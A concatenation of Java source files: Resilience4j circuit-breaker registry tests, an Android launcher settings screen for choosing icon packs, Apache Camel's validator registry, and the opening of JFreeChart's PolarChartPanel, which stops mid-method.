Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(circuitBreakerConfigs, circuitBreakerTags);
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(circuitBreakerTags);
}
@Test
public void tagsAddedToInstance() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
Map<String, String> retryTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("testName", retryTags);
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(retryTags);
}
@Test
public void tagsOfRetriesShouldNotBeMixed() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("testName", circuitBreakerConfig, circuitBreakerTags);
Map<String, String> circuitBreakerTags2 = Map.of("key3", "value3", "key4", "value4");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry
.circuitBreaker("otherTestName", circuitBreakerConfig, circuitBreakerTags2);
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(circuitBreakerTags);
assertThat(circuitBreaker2.getTags()).containsAllEntriesOf(circuitBreakerTags2);
}
@Test
public void tagsOfInstanceTagsShouldOverrideRegistryTags() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.ofDefaults();
Map<String, CircuitBreakerConfig> circuitBreakerConfigs = Collections
.singletonMap("default", circuitBreakerConfig);
Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
Map<String, String> instanceTags = Map.of("key1", "value3", "key4", "value4");
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(circuitBreakerConfigs, circuitBreakerTags);
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("testName", circuitBreakerConfig, instanceTags);
Map<String, String> expectedTags = Map.of("key1", "value3", "key2", "value2", "key4", "value4");
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(expectedTags);
}
@Test
public void testCreateWithDefaultConfiguration() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(CircuitBreakerConfig.ofDefaults());
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
@Test
public void testCreateWithCustomConfiguration() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(circuitBreakerConfig);
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateWithConfigurationMap() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(30f).build();
CircuitBreakerConfig customCircuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(40f).build();
Map<String, CircuitBreakerConfig> configs = new HashMap<>();
configs.put("default", circuitBreakerConfig);
configs.put("custom", customCircuitBreakerConfig);
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.of(configs);
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(30f);
assertThat(circuitBreakerRegistry.getConfiguration("custom")).isNotEmpty();
}
@Test
public void testCreateWithSingleRegistryEventConsumer() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(CircuitBreakerConfig.ofDefaults(), new NoOpCircuitBreakerEventConsumer());
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateWithMultipleRegistryEventConsumer() {
List<RegistryEventConsumer<CircuitBreaker>> registryEventConsumers = new ArrayList<>();
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(CircuitBreakerConfig.ofDefaults(), registryEventConsumers);
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateWithConfigurationMapWithSingleRegistryEventConsumer() {
Map<String, CircuitBreakerConfig> configs = new HashMap<>();
configs.put("custom", CircuitBreakerConfig.ofDefaults());
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(configs, new NoOpCircuitBreakerEventConsumer());
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateWithConfigurationMapWithMultiRegistryEventConsumer() {
Map<String, CircuitBreakerConfig> configs = new HashMap<>();
configs.put("custom", CircuitBreakerConfig.ofDefaults());
List<RegistryEventConsumer<CircuitBreaker>> registryEventConsumers = new ArrayList<>();
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
registryEventConsumers.add(new NoOpCircuitBreakerEventConsumer());
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(configs, registryEventConsumers);
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testAddConfiguration() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
circuitBreakerRegistry.addConfiguration("someSharedConfig", circuitBreakerConfig);
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(50f);
assertThat(circuitBreakerRegistry.getConfiguration("someSharedConfig")).isNotEmpty();
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("name", "someSharedConfig");
assertThat(circuitBreaker.getCircuitBreakerConfig()).isEqualTo(circuitBreakerConfig);
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateWithConfigurationMapWithoutDefaultConfig() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry
.of(Collections.singletonMap("someSharedConfig", circuitBreakerConfig));
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(50f);
assertThat(circuitBreakerRegistry.getConfiguration("someSharedConfig")).isNotEmpty();
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("name", "someSharedConfig");
assertThat(circuitBreaker.getCircuitBreakerConfig()).isEqualTo(circuitBreakerConfig);
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateWithNullConfig() {
assertThatThrownBy(() -> CircuitBreakerRegistry.of((CircuitBreakerConfig) null))
.isInstanceOf(NullPointerException.class).hasMessage("Config must not be null");
}
@Test
public void testCreateUsingBuilderWithDefaultConfig() {
CircuitBreakerRegistry circuitBreakerRegistry =
CircuitBreakerRegistry.custom().withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults()).build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
@Test
public void testCreateUsingBuilderWithCustomConfig() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry =
CircuitBreakerRegistry.custom().withCircuitBreakerConfig(circuitBreakerConfig).build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test
public void testCreateUsingBuilderWithoutDefaultConfig() {
float failureRate = 30f;
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(failureRate).build();
CircuitBreakerRegistry circuitBreakerRegistry =
CircuitBreakerRegistry.custom().addCircuitBreakerConfig("someSharedConfig", circuitBreakerConfig).build();
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(50f);
assertThat(circuitBreakerRegistry.getConfiguration("someSharedConfig")).isNotEmpty();
CircuitBreaker circuitBreaker = circuitBreakerRegistry
.circuitBreaker("name", "someSharedConfig");
assertThat(circuitBreaker.getCircuitBreakerConfig()).isEqualTo(circuitBreakerConfig);
assertThat(circuitBreaker.getCircuitBreakerConfig().getFailureRateThreshold())
.isEqualTo(failureRate);
}
@Test(expected = IllegalArgumentException.class)
public void testAddMultipleDefaultConfigUsingBuilderShouldThrowException() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(30f).build();
CircuitBreakerRegistry.custom().addCircuitBreakerConfig("default", circuitBreakerConfig).build();
}
@Test
public void testCreateUsingBuilderWithDefaultAndCustomConfig() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(30f).build();
CircuitBreakerConfig customCircuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(40f).build();
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(circuitBreakerConfig)
.addCircuitBreakerConfig("custom", customCircuitBreakerConfig)
.build();
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(30f);
assertThat(circuitBreakerRegistry.getConfiguration("custom")).isNotEmpty();
}
@Test
public void testCreateUsingBuilderWithNullConfig() {
assertThatThrownBy(
() -> CircuitBreakerRegistry.custom().withCircuitBreakerConfig(null).build())
.isInstanceOf(NullPointerException.class).hasMessage("Config must not be null");
}
@Test
public void testCreateUsingBuilderWithMultipleRegistryEventConsumer() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults())
.addRegistryEventConsumer(new NoOpCircuitBreakerEventConsumer())
.addRegistryEventConsumer(new NoOpCircuitBreakerEventConsumer())
.build();
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateUsingBuilderWithRegistryTags() {
Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults())
.withTags(circuitBreakerTags)
.build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(circuitBreakerTags);
}
@Test
public void testCreateUsingBuilderWithRegistryStore() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults())
.withRegistryStore(new InMemoryRegistryStore<>())
.build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
private static class NoOpCircuitBreakerEventConsumer implements
RegistryEventConsumer<CircuitBreaker> {
@Override
public void onEntryAddedEvent(EntryAddedEvent<CircuitBreaker> entryAddedEvent) {
}
@Override
public void onEntryRemovedEvent(EntryRemovedEvent<CircuitBreaker> entryRemoveEvent) {
}
@Override
public void onEntryReplacedEvent(EntryReplacedEvent<CircuitBreaker> entryReplacedEvent) {
}
}
}
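// ---------------------------------------------------------------------------
// Illustrative sketch (not part of the original test class): the usual way a
// CircuitBreaker obtained from a registry protects a call. The backend call
// below is a placeholder lambda.
// ---------------------------------------------------------------------------
class CircuitBreakerRegistryUsageSketch {
    static String callBackend() {
        CircuitBreakerRegistry registry = CircuitBreakerRegistry.ofDefaults();
        CircuitBreaker circuitBreaker = registry.circuitBreaker("backendService");
        // executeSupplier records success/failure against the breaker's sliding window
        return circuitBreaker.executeSupplier(() -> "response from backend");
    }
}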
|
|
package g7.bluesky.launcher3.setting;
import android.annotation.TargetApi;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.content.res.Configuration;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.preference.ListPreference;
import android.preference.Preference;
import android.preference.PreferenceActivity;
import android.preference.PreferenceFragment;
import android.preference.PreferenceManager;
import java.util.ArrayList;
import java.util.List;
import g7.bluesky.launcher3.Launcher;
import g7.bluesky.launcher3.R;
/**
* A {@link PreferenceActivity} that presents a set of application settings. On
* handset devices, settings are presented as a single list. On tablets,
* settings are split by category, with category headers shown to the left of
* the list of settings.
* <p/>
* See <a href="http://developer.android.com/design/patterns/settings.html">
* Android Design: Settings</a> for design guidelines and the <a
* href="http://developer.android.com/guide/topics/ui/settings.html">Settings
* API Guide</a> for more information on developing a Settings UI.
*/
public class SettingsActivity extends PreferenceActivity {
/**
* {@inheritDoc}
*/
@Override
public boolean onIsMultiPane() {
return isXLargeTablet(this);
}
/**
* Helper method to determine if the device has an extra-large screen. For
* example, 10" tablets are extra-large.
*/
private static boolean isXLargeTablet(Context context) {
return (context.getResources().getConfiguration().screenLayout
& Configuration.SCREENLAYOUT_SIZE_MASK) >= Configuration.SCREENLAYOUT_SIZE_XLARGE;
}
/**
* {@inheritDoc}
*/
@Override
@TargetApi(Build.VERSION_CODES.HONEYCOMB)
public void onBuildHeaders(List<Header> target) {
loadHeadersFromResource(R.xml.pref_headers, target);
}
@Override
protected boolean isValidFragment(String fragmentName) {
return GeneralPreferenceFragment.class.getName().equals(fragmentName);
}
/**
* A preference value change listener that updates the preference's summary
* to reflect its new value.
*/
private static Preference.OnPreferenceChangeListener sBindPreferenceSummaryToValueListener = new Preference.OnPreferenceChangeListener() {
@Override
public boolean onPreferenceChange(Preference preference, Object value) {
String stringValue = value.toString();
if (preference instanceof ListPreference) {
// For list preferences, look up the correct display value in
// the preference's 'entries' list.
ListPreference listPreference = (ListPreference) preference;
int index = listPreference.findIndexOfValue(stringValue);
// Set the summary to reflect the new value.
preference.setSummary(
index >= 0
? listPreference.getEntries()[index]
: null);
} else {
// For all other preferences, set the summary to the value's
// simple string representation.
preference.setSummary(stringValue);
}
return true;
}
};
/**
* Binds a preference's summary to its value. More specifically, when the
* preference's value is changed, its summary (line of text below the
* preference title) is updated to reflect the value. The summary is also
* immediately updated upon calling this method. The exact display format is
* dependent on the type of preference.
*
* @see #sBindPreferenceSummaryToValueListener
*/
private static void bindPreferenceSummaryToValue(Preference preference) {
// Set the listener to watch for value changes.
preference.setOnPreferenceChangeListener(sBindPreferenceSummaryToValueListener);
// Trigger the listener immediately with the preference's
// current value.
sBindPreferenceSummaryToValueListener.onPreferenceChange(preference,
PreferenceManager
.getDefaultSharedPreferences(preference.getContext())
.getString(preference.getKey(), ""));
}
/**
* This fragment shows general preferences only. It is used when the
* activity is showing a two-pane settings UI.
*/
@TargetApi(Build.VERSION_CODES.HONEYCOMB)
public static class GeneralPreferenceFragment extends PreferenceFragment {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
addPreferencesFromResource(R.xml.pref_general);
bindPreferenceSummaryToValue(findPreference(SettingConstants.LAYOUT_PREF_KEY));
bindPreferenceSummaryToValue(findPreference(SettingConstants.THEME_PREF_KEY));
bindPreferenceSummaryToValue(findPreference(SettingConstants.TEXT_COLOR_PREF_KEY));
bindPreferenceSummaryToValue(findPreference(SettingConstants.THEME_OPACITY_PREF_KEY));
// List to select icon pack
final ListPreference lp = (ListPreference) findPreference(SettingConstants.ICON_THEME_PREF_KEY);
// Package names to save to the preference
final List<String> iconPacksPackageName = new ArrayList<>();
// Labels to display in the list
final List<String> iconPacksName = new ArrayList<>();
// Flags marking whether each icon pack is installed
final List<Boolean> iconPacksIsInstalled = new ArrayList<>();
// Default icon
iconPacksName.add("Default");
iconPacksPackageName.add(Launcher.class.getPackage().getName());
iconPacksIsInstalled.add(true);
// Find installed icon packs that expose the Apex launcher theme intent
PackageManager pm = getActivity().getPackageManager();
final Intent mainIntent = new Intent(Intent.ACTION_MAIN, null);
mainIntent.addCategory("com.anddoes.launcher.THEME");
List<ResolveInfo> installPacks = pm.queryIntentActivities(mainIntent, 0);
if (installPacks != null && installPacks.size() > 0) {
for (ResolveInfo resolveInfo: installPacks) {
iconPacksPackageName.add(resolveInfo.activityInfo.packageName);
iconPacksName.add(resolveInfo.loadLabel(pm).toString());
iconPacksIsInstalled.add(true);
}
}
// Suggest a few well-known icon packs if they are not installed
String[] someIconsName = {"nexbit.icons.moonshine===Moonshine", "com.numix.icons_circle===Numix Circle", "com.numix.icons_fold===Numix Fold"};
for (int i = 0; i < someIconsName.length; ++i) {
String[] tmp = someIconsName[i].split("===");
if (! iconPacksPackageName.contains(tmp[0])) {
iconPacksPackageName.add(tmp[0]);
iconPacksName.add("[Install] " + tmp[1]);
iconPacksIsInstalled.add(false);
}
}
// Default to the system (launcher) icon pack when no value has been chosen yet
if (lp.getValue() == null) {
lp.setValue(Launcher.class.getPackage().getName());
}
lp.setEntries(iconPacksName.toArray(new String[iconPacksName.size()]));
lp.setEntryValues(iconPacksPackageName.toArray(new String[iconPacksPackageName.size()]));
String selectedIconTheme = getPreferenceManager().getSharedPreferences().getString(SettingConstants.ICON_THEME_PREF_KEY, Launcher.class.getPackage().getName());
int idxOfSelectedIconTheme = iconPacksPackageName.indexOf(selectedIconTheme);
if (idxOfSelectedIconTheme != -1 && idxOfSelectedIconTheme < iconPacksName.size()) {
lp.setSummary(iconPacksName.get(idxOfSelectedIconTheme));
}
lp.setOnPreferenceChangeListener(new Preference.OnPreferenceChangeListener() {
@Override
public boolean onPreferenceChange(Preference preference, Object newValue) {
String iconTheme = newValue.toString();
int idxOfIconTheme = iconPacksPackageName.indexOf(iconTheme);
if (idxOfIconTheme != -1 && idxOfIconTheme < iconPacksIsInstalled.size()) {
// If the icon pack is installed, save it to the preference; otherwise open its Play Store page
if (iconPacksIsInstalled.get(idxOfIconTheme)) {
lp.setSummary(iconPacksName.get(idxOfIconTheme));
getActivity().finish();
return true;
} else {
startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("https://play.google.com/store/apps/details?id=" + iconTheme)));
getActivity().finish();
}
}
return false;
}
});
}
}
}
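// ---------------------------------------------------------------------------
// Illustrative sketch (not part of the original file): the settings screen is
// typically opened from the launcher with a plain Intent.
// ---------------------------------------------------------------------------
class SettingsActivityLaunchSketch {
    static void open(Context context) {
        Intent intent = new Intent(context, SettingsActivity.class);
        // Needed only when starting from a non-activity context
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(intent);
    }
}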
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.impl;
import java.util.ArrayList;
import java.util.Collection;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentMap;
import org.apache.camel.CamelContext;
import org.apache.camel.impl.validator.ValidatorKey;
import org.apache.camel.model.validator.ValidatorDefinition;
import org.apache.camel.spi.DataType;
import org.apache.camel.spi.Validator;
import org.apache.camel.spi.ValidatorRegistry;
import org.apache.camel.util.CamelContextHelper;
import org.apache.camel.util.LRUCache;
import org.apache.camel.util.ObjectHelper;
import org.apache.camel.util.ServiceHelper;
/**
* Default implementation of {@link org.apache.camel.spi.ValidatorRegistry}.
*/
public class DefaultValidatorRegistry extends LRUCache<ValidatorKey, Validator> implements ValidatorRegistry<ValidatorKey> {
private static final long serialVersionUID = 1L;
private ConcurrentMap<ValidatorKey, Validator> staticMap;
private final CamelContext context;
public DefaultValidatorRegistry(CamelContext context) throws Exception {
this(context, new ArrayList<>());
}
public DefaultValidatorRegistry(CamelContext context, List<ValidatorDefinition> definitions) throws Exception {
// do not stop on eviction, as the validator may still be in use
super(CamelContextHelper.getMaximumValidatorCacheSize(context), CamelContextHelper.getMaximumValidatorCacheSize(context), false);
// static map to hold validators we do not want to be evicted
this.staticMap = new ConcurrentHashMap<>();
this.context = context;
for (ValidatorDefinition def : definitions) {
Validator validator = def.createValidator(context);
context.addService(validator);
put(new ValidatorKey(new DataType(def.getType())), validator);
}
}
public Validator resolveValidator(ValidatorKey key) {
Validator answer = get(key);
if (answer == null && ObjectHelper.isNotEmpty(key.getType().getName())) {
answer = get(new ValidatorKey(new DataType(key.getType().getModel())));
}
return answer;
}
@Override
public void start() throws Exception {
resetStatistics();
}
@Override
public Validator get(Object o) {
// try static map first
Validator answer = staticMap.get(o);
if (answer == null) {
answer = super.get(o);
} else {
hits.incrementAndGet();
}
return answer;
}
@Override
public Validator put(ValidatorKey key, Validator validator) {
// first check whether the key already exists and, if so, replace it in place so it keeps its original spot
Validator answer = staticMap.remove(key);
if (answer != null) {
// replace existing
staticMap.put(key, validator);
return answer;
}
answer = super.remove(key);
if (answer != null) {
// replace existing
super.put(key, validator);
return answer;
}
// we want validators to be static if they are part of setting up or starting routes
if (context.isSetupRoutes() || context.isStartingRoutes()) {
answer = staticMap.put(key, validator);
} else {
answer = super.put(key, validator);
}
return answer;
}
@Override
public void putAll(Map<? extends ValidatorKey, ? extends Validator> map) {
// need to use put instead of putAll to ensure the entries get added to either the static or the dynamic map
for (Map.Entry<? extends ValidatorKey, ? extends Validator> entry : map.entrySet()) {
put(entry.getKey(), entry.getValue());
}
}
@Override
public boolean containsKey(Object o) {
return staticMap.containsKey(o) || super.containsKey(o);
}
@Override
public boolean containsValue(Object o) {
return staticMap.containsValue(o) || super.containsValue(o);
}
@Override
public int size() {
return staticMap.size() + super.size();
}
public int staticSize() {
return staticMap.size();
}
@Override
public int dynamicSize() {
return super.size();
}
@Override
public boolean isEmpty() {
return staticMap.isEmpty() && super.isEmpty();
}
@Override
public Validator remove(Object o) {
Validator answer = staticMap.remove(o);
if (answer == null) {
answer = super.remove(o);
}
return answer;
}
@Override
public void clear() {
staticMap.clear();
super.clear();
}
@Override
public Set<ValidatorKey> keySet() {
Set<ValidatorKey> answer = new LinkedHashSet<>();
answer.addAll(staticMap.keySet());
answer.addAll(super.keySet());
return answer;
}
@Override
public Collection<Validator> values() {
Collection<Validator> answer = new ArrayList<>();
answer.addAll(staticMap.values());
answer.addAll(super.values());
return answer;
}
@Override
public Set<Entry<ValidatorKey, Validator>> entrySet() {
Set<Entry<ValidatorKey, Validator>> answer = new LinkedHashSet<>();
answer.addAll(staticMap.entrySet());
answer.addAll(super.entrySet());
return answer;
}
@Override
public int getMaximumCacheSize() {
return super.getMaxCacheSize();
}
/**
* Purges the cache
*/
@Override
public void purge() {
// only purge the dynamic part
super.clear();
}
@Override
public boolean isStatic(DataType type) {
return staticMap.containsKey(new ValidatorKey(type));
}
@Override
public boolean isDynamic(DataType type) {
return super.containsKey(new ValidatorKey(type));
}
@Override
public void stop() throws Exception {
ServiceHelper.stopServices(staticMap.values());
ServiceHelper.stopServices(values());
purge();
}
@Override
public String toString() {
return "ValidatorRegistry for " + context.getName() + ", capacity: " + getMaxCacheSize();
}
}
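// ---------------------------------------------------------------------------
// Illustrative sketch (not part of the original Camel source): resolving a
// validator by data type. The "json:MyOrder" URN and the registry wiring are
// placeholders for whatever the CamelContext actually configures.
// ---------------------------------------------------------------------------
class DefaultValidatorRegistryUsageSketch {
    static Validator lookup(CamelContext camelContext) throws Exception {
        DefaultValidatorRegistry registry = new DefaultValidatorRegistry(camelContext);
        // resolveValidator falls back from the full type name to its model if no exact match exists
        return registry.resolveValidator(new ValidatorKey(new DataType("json:MyOrder")));
    }
}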
|
|
/* ===========================================================
* JFreeChart : a free chart library for the Java(tm) platform
* ===========================================================
*
* (C) Copyright 2000-2007, by Object Refinery Limited and Contributors.
*
* Project Info: http://www.jfree.org/jfreechart/index.html
*
* This library is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation; either version 2.1 of the License, or
* (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
* or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
* License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
* USA.
*
* [Java is a trademark or registered trademark of Sun Microsystems, Inc.
* in the United States and other countries.]
*
* --------------------
* PolarChartPanel.java
* --------------------
* (C) Copyright 2004, 2007, by Solution Engineering, Inc. and Contributors.
*
* Original Author: Daniel Bridenbecker, Solution Engineering, Inc.;
* Contributor(s): David Gilbert (for Object Refinery Limited);
*
* $Id: PolarChartPanel.java,v 1.2.2.2 2007/02/02 15:53:36 mungady Exp $
*
* Changes
* -------
* 19-Jan-2004 : Version 1, contributed by DB with minor changes by DG (DG);
* ------------- JFREECHART 1.0.x ---------------------------------------------
* 02-Feb-2007 : Removed author tags all over JFreeChart sources (DG);
*
*/
package org.jfree.chart;
import java.awt.Component;
import java.awt.event.ActionEvent;
import javax.swing.JMenuItem;
import javax.swing.JPopupMenu;
import org.jfree.chart.plot.Plot;
import org.jfree.chart.plot.PolarPlot;
/**
* <code>PolarChartPanel</code> is the top level object for using the
 * {@link PolarPlot}. Since this class has a <code>JPanel</code> in its
 * inheritance hierarchy, it can be used to integrate the polar plot into
 * an application.
* <p>
* The main modification to <code>ChartPanel</code> is the popup menu. It
* removes <code>ChartPanel</code>'s versions of:
* <ul>
* <li><code>Zoom In</code></li>
* <li><code>Zoom Out</code></li>
* <li><code>Auto Range</code></li>
* </ul>
* and replaces them with versions more appropriate for {@link PolarPlot}.
*/
public class PolarChartPanel extends ChartPanel {
// -----------------
// --- Constants ---
// -----------------
/** Zoom in command string. */
private static final String POLAR_ZOOM_IN_ACTION_COMMAND = "Polar Zoom In";
/** Zoom out command string. */
private static final String POLAR_ZOOM_OUT_ACTION_COMMAND
= "Polar Zoom Out";
/** Auto range command string. */
private static final String POLAR_AUTO_RANGE_ACTION_COMMAND
= "Polar Auto Range";
// ------------------------
// --- Member Variables ---
// ------------------------
// --------------------
// --- Constructors ---
// --------------------
/**
* Constructs a JFreeChart panel.
*
* @param chart the chart.
*/
public PolarChartPanel(JFreeChart chart) {
this(chart, true);
}
/**
* Creates a new panel.
*
* @param chart the chart.
 * @param useBuffer  whether to use an off-screen buffer when drawing.
*/
public PolarChartPanel(JFreeChart chart, boolean useBuffer) {
super(chart, useBuffer);
checkChart(chart);
setMinimumDrawWidth(200);
setMinimumDrawHeight(200);
setMaximumDrawWidth(2000);
setMaximumDrawHeight(2000);
}
// --------------------------
// --- ChartPanel Methods ---
// --------------------------
/**
* Sets the chart that is displayed in the panel.
*
* @param chart The chart.
*/
public void setChart(JFreeChart chart) {
checkChart(chart);
super.setChart(chart);
}
/**
* Creates a popup menu for the panel.
*
* @param properties include a menu item for the chart property editor.
* @param save include a menu item for saving the chart.
* @param print include a menu item for printing the chart.
* @param zoom include menu items for zooming.
*
* @return The popup menu.
*/
protected JPopupMenu createPopupMenu(boolean properties,
boolean save,
boolean print,
boolean zoom) {
JPopupMenu result = super.createPopupMenu(properties, save, print, zoom);
int zoomInIndex = getPopupMenuItem(result, "Zoom In");
int zoomOutIndex = getPopupMenuItem(result, "Zoom Out");
int autoIndex = getPopupMenuItem(result, "Auto Range");
if (zoom) {
JMenuItem zoomIn = new JMenuItem("Zoom In");
zoomIn.setActionCommand(POLAR_ZOOM_IN_ACTION_COMMAND);
zoomIn.addActionListener(this);
JMenuItem zoomOut = new JMenuItem("Zoom Out");
